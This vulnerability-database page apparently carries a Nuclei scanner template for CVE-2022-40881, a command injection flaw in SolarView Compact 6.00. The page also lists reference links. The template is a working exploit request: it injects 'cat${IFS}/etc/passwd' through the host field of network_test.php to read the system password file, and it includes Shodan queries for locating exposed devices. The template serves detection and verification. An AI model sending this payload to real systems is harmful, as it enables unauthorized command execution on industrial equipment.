Lucene search
K

SolarView 6.00 - Remote Command Execution

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 49 Views

SolarView Compact 6.00 RCE via network_test.ph

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Command Injection in Contec Solarview_Compact_Firmware
25 Feb 202306:54
githubexploit
Circl
CVE-2022-40881
21 Dec 202400:00
circl
CNNVD
Contec SolarView Compact 命令注入漏洞
17 Nov 202200:00
cnnvd
CVE
CVE-2022-40881
17 Nov 202200:00
cve
Cvelist
CVE-2022-40881
17 Nov 202200:00
cvelist
Japan Vulnerability Notes
Multiple vulnerabilities in CONTEC SolarView Compact
27 May 202206:28
jvn
NVD
CVE-2022-40881
17 Nov 202204:15
nvd
OSV
CVE-2022-40881
17 Nov 202204:15
osv
Prion
Command injection
17 Nov 202204:15
prion
Positive Technologies
PT-2022-25605
12 May 202200:00
ptsecurity
Rows per page
id: CVE-2022-40881

info:
  name: SolarView 6.00 - Remote Command Execution
  author: For3stCo1d
  severity: critical
  description: |
    SolarView Compact 6.00 is vulnerable to a command injection via network_test.php.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
  remediation: |
    Apply the latest patch or upgrade to a non-vulnerable version of SolarView.
  reference:
    - https://github.com/Timorlover/SolarView_Compact_6.0_rce_via_network_test.php
    - https://github.com/advisories/GHSA-wx3r-88rg-whxq
    - https://nvd.nist.gov/vuln/detail/CVE-2022-40881
    - https://github.com/KayCHENvip/vulnerability-poc
    - https://github.com/Threekiii/Awesome-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-40881
    cwe-id: CWE-77
    epss-score: 0.29451
    epss-percentile: 0.97957
    cpe: cpe:2.3:h:contec:solarview_compact:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: contec
    product: solarview_compact
    shodan-query:
      - http.favicon.hash:"-244067125"
      - cpe:"cpe:2.3:h:contec:solarview_compact"
  tags: cve,cve2022,solarview,rce,lfi,contec,vkev,vuln
variables:
  cmd: "cat${IFS}/etc/passwd"

http:
  - raw:
      - |
        POST /network_test.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        host=%0a{{cmd}}%0a&command=ping

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022039cbc69ee5326a835149159a1eb8c628eb309d0d815470e6a300b1a4838182e1022040a8e32ac77690dce02cce574b5c3b1686826c999471684eb827cd84609a3807:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.8
EPSS0.29451
SSVC
49